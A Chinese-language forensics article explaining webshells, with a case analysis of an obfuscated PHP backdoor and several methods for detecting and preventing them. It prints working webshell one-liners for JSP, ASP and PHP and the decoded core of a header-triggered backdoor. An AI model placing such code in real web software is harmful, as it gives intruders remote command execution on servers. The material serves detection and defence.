世界上没有绝对安全的系统

当一名黑客获得你的访问控制权限

他可以操作你的服务器

你的数据库，你的后台

甚至，你的一切……

网站被入侵了？

办案人员常常接到这样的案件：某单位网站遭黑客入侵，被非法上传webshell，首页被修改，系统功能不能正常使用，网站目录下面被上传了大量的asp、php、htm的页面，网站数据库数据被窃取，黑客还赤裸裸的留下大名。

那到底什么是webshell？它有什么危害？如何检测及防范？今天我们就好好来说道说道。（欢迎行业老司机们补充指正~）

1.初识webshell

Webshell是web入侵的脚本攻击工具，简单来说，webshell就是一个asp或php木马后门。当黑客在入侵企业网站时，通常要通过各种方式上传webshell从而获得企业网站的控制权，然后方便进行之后的入侵行为。入侵完成后，将这些asp或php木马后门文件放置在网站服务器的web目录中，与正常的网页文件混在一起，让人难辨真假。因此，检测webshell对网站的安全非常重要。

分类

原理

▲jsp的简单的webshell

<%Runtime.getRuntime().exec(request.getParameter("xxx"));%>

▲asp的简单的webshell

<%evalrequest("xxx")%>

▲php的简单的webshell

<?php $a=eval($_GET["xxx"]);?>

webshell含有相同的本质，即：

执行系统命令的函数+接收web参数的功能函数

使用webshell就像是打开一个特殊的web页面，只有当传入的参数正确时才能顺利使用。

例如：1.php

内容为：<?php @eval(@_POST["A"]);?>

只有打开1.php页面且数据包参数有"A"时，才能正确连接使用该后门。

通过连接webshell，执行系统命令，可以查看计算机本机文件，查看用户、密码等敏感信息，还可以直接生成、修改文件（生成木马病毒文件或者网页挂马，数据库添加xss代码等），以及直接下载上传更多文件。

特点

1.存在系统调用的命令执行函数，如eval，system，cmd_shell，assert等；

2.存在系统调用的文件操作函数，如fopen，fwrite，readdir等；

3.存在数据库操作函数，调用系统自身的存储过程来连接数据库操作；

4.隐匿性与伪装性，可隐藏到正常的web源码中；

5.访问ip、次数少，页面孤立；

6.会产生payload流量，可以通过流量镜像与web日志进行检测；

7.变种多，通过各种函数加密，绕过检测。

变种类型

1.函数调用

最终结果: eval(base64_encode${"_POST"}['xxxx'])

2.拼接语句

最终结果: assert(${"_POST"}['sz']);

3.字符操作

4.编码混淆

5 其他：文件名利用

危害

1.长期控制web服务器、主机；

2.上传任意文件或者其他危害性病毒例如（勒索，挖矿病毒），也可以从主机下载任意文件；

3.修改web主页，篡改图片，造成不良社会印象（例如篡改国旗）；

4.偷窃删除数据（数据库数据，用户密码，个人信息之类）；

5. 控制服务器当肉鸡、攻击跳板，对其他用户实现DDos等攻击。

2.webshell案例分析

对于新手或者经验较少者，很多时候并不能认识或者了解各种各样的文件。不知道那些文件是什么，有什么样的功能，更不敢乱动或者删除。即使发现了可疑的文件也不敢轻举妄动。

在这里举个webshell的分析案例，一步步清理、确认、分析这个webshell的功能与入侵者是如何使用。

原始文件如下，代码混乱

去除注释、排版

分析代码发现，大部分的代码都是通过字符串的|、^、.操作赋值，只有最后两行代码是关键性的代码，而其中的变量都是通过前面的初始化或者是运算得到的。那么我们就可以注释最后两行代码，输出其中所有的变量。

结果如下：

带入到最后的两行代码中，得到：

if(md5(getenv('HTTP_A'))=='5d15db53a91790e913dc4e05a1319c42') $bIywY=create_function('$a,$b,$c',getenv('HTTP_X_UP_CALLING_LINE_ID');

payload

分析如下

当接受参数A时，如果md5(A)== '5d15db53a91790e913dc4e05a1319c42'

则创建匿名函数bIywY,功能为接收('HTTP_X_UP_CALLING_LINE_ID')

然后执行此函数。

黑客入侵时，只需要在HTTP_X_UP_CALLING_LINE_ID部分添加命令即可执行。

3.如何检测webshell？

WebShell检测是攻防对抗中的一个重要环节，是安全防护人员必修之课。如何快速检测Web Server是否已经被植入WebShell文件或代码，对网站安全来说至关重要。

动态检测

跟踪代码执行的函数/变量。

通过PHP扩展的webshell实时动态检测方法,可以基于PHP扩展对PHP代码的编译执行进行监控并结合外部输入变量的标记追踪、黑白名单机制来进行webshell的实时动态检测。

优点：可以有效针对变形、加密的webshell进行检测

缺点：当文件过多时的处理速度可能较慢，不满足用户需求

静态检测

对脚本文件中所使用的关键词、高危函数、文件修改时间、文件权限、 文件所有者以及和其它文件的关联性等多个维度的特征进行检测，即先建立一个恶意字符串特征库。

1.危险函数

① 命令执行函数

php：exec()eval()assert()shell_exec()system()

jsp：Runtime.exec(String cmd)

②接受web参数函数

php：$_POST $_GET $_REQUEST

jsp：request.getParameter()

③变形函数(编码/字符串变形)

php：base64,sha1,md5, preg_replace,pack(hex)

④文件操作函数

php：fpassthru()fsockopen()

⑤其他函数

php：create_fuction()//匿名函数

优点：可快速检测，快速定位

缺点：容易误报，无法对加密或者经过特殊处理的Webshell文件进行检测。尤其是针对窃密型Webshell无法做到准确的检测：窃密型Webshell通常具有和正常的WEB脚本文件具有相似的特征

2.样貌特征

①文件名

或者部分比较直观的名字

②伪装的文件

③加密类型

优点：可以人工肉眼直观的找出不正常，不合理的文件

缺点：对于隐藏在正常文件中的后门以及大马(被恶意使用的大段正常代码)无法做出判断

流量检测

1、抓取工具特征流量

根据抓取的流量显示，对WebShell所做的操作的结果，都会以字符串的形式返回给菜刀进行处理，并显示出来。字符串形式为 "->|xxxx|<-"，为菜刀WebShell的特征字符。若发现成功利用菜刀WebShell的行为，基于该特征字符，将会发现此类攻击事件。

优点：可实时检测并阻止，还原攻击场景，快速定位主机和入侵者

缺点：无法检测加密payload，流量镜像部署成本,甚至有可能拖累服务

日志分析

1.访问特征

少量IP访问，总访问次数少，页面孤立。

2.路径特征

不同手段植入的webshell路径各有特征；自动生成文件名，然后放在特定的目录下。

3.时间特征

新创建页面视为异常页面。

注：日志分析只能作为辅助判断或增加异常权重的指标。

优点：可以帮助过滤数据，快速寻找检测的方向与切入点

缺点：不能作为绝对准确的判断手法，更多的是作为辅助方案

统计学检测

1.信息熵

数学上的抽象概念,这里把信息熵理解成某种特定信息的出现概率（离散随机事件的出现概率）。一个系统越是有序，信息熵就越低。反之，一个系统越是混乱，信息熵就越高，为webshell的可能性越高。

2.文件中的最长单词

正常文件中单词是比较短的,当一个文件中的最长单词很长时，这些长单词是很可疑的。一般webshell经过base64编码后会形成一个长字符串。

优点：对于混淆代码的识别能力较强

缺点：限制于代码编写者的写作习惯与混淆方式，对于附加在正常文件里的恶意代码检测能力较弱

已知后门对比

1.文件相似度

大部分入侵者为脚本小子的级别，并不会自己生成webshell，而是从网上获取他人的脚本且几乎不改变，这种情况下文件相似度极大。

2.文件hash，md5值对比

优点：准确率高

缺点：需要大量的数据组成样本库，且大量文件对比的情况下检测速度较慢

机器学习

Webshell 必然有一些规律，比如执行了某些操作（执行获取到的命令、列出目录文件、上传文件、查看文件等等）。如果直接用源代码分析，会出现很多的噪音，比如注释内容、花操作等等。如果我们将Webshell的源代码转化成仅含执行语句操作的内容，就会一定程度上，过滤掉这些噪音。通过采用词袋，词频等方法来进行提取关键特征。最后使用分类的算法来进行训练。

优点：准确率高

缺点：需要大量的训练数据与优秀的数学建模，提升成本

4.如何防止系统被植入WebShell?

关闭危险函数、系统命令函数的使用功能

注意敏感信息隐藏。例如，不回显上传文件路径，报错信息等

加强输入、上传文件的检查

关闭上传文件夹的代码执行权限

对上传的文件进行改名

关闭危险或不需要的端口

及时加固，打补丁

使用waf之类的安全工具

本文详细介绍了入侵取证过程中常见的webshell木马以及7种检测木马的方案方法，可以为防范入侵以及计算机取证工作带来更多的思路和线索。

文章部分内容参考于网络，如对文中的操作、描述有任何疑问，或者有任何入侵取证、计算机取证需求，欢迎拨打热线电话028-85211099或直接在微信公众号给我们留言，我们会尽快联系您。